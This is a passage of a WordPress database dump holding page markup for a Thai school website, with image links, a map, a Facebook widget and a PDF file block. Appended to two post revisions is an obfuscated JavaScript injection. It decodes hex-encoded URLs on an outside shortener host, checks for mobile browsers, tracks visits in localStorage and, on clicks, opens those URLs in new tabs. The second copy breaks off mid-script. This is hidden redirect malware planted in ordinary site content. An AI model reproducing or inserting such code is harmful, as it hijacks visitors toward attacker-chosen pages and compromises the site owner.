class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=700\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"_cc83b8-a1\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab_cc83b8-a1\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=748\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":808,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=810\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือ.png\" alt=\"\" class=\"wp-image-808\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-15 09:32:38','2024-08-15 02:32:38','',14,'http://pakhaeng.ssk.in.th/?p=835',0,'revision','',0),
(836,1,'2024-08-15 09:35:35','2024-08-15 02:35:35','<!-- wp:file {\"id\":868,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/รายงานการรับทรัพย์สิน-หรือประโยชน์อื่นใด.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/รายงานการรับทรัพย์สิน-หรือประโยชน์อื่นใด.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"รายงานการรับทรัพย์สิน หรือประโยชน์อื่นใด\"></object><a id=\"wp-block-file--media-5f090277-40fa-47cb-88d1-851b9d078401\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/รายงานการรับทรัพย์สิน-หรือประโยชน์อื่นใด.pdf\">รายงานการรับทรัพย์สิน หรือประโยชน์อื่นใด</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/รายงานการรับทรัพย์สิน-หรือประโยชน์อื่นใด.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-5f090277-40fa-47cb-88d1-851b9d078401\">Download</a></div>\n<!-- /wp:file -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const 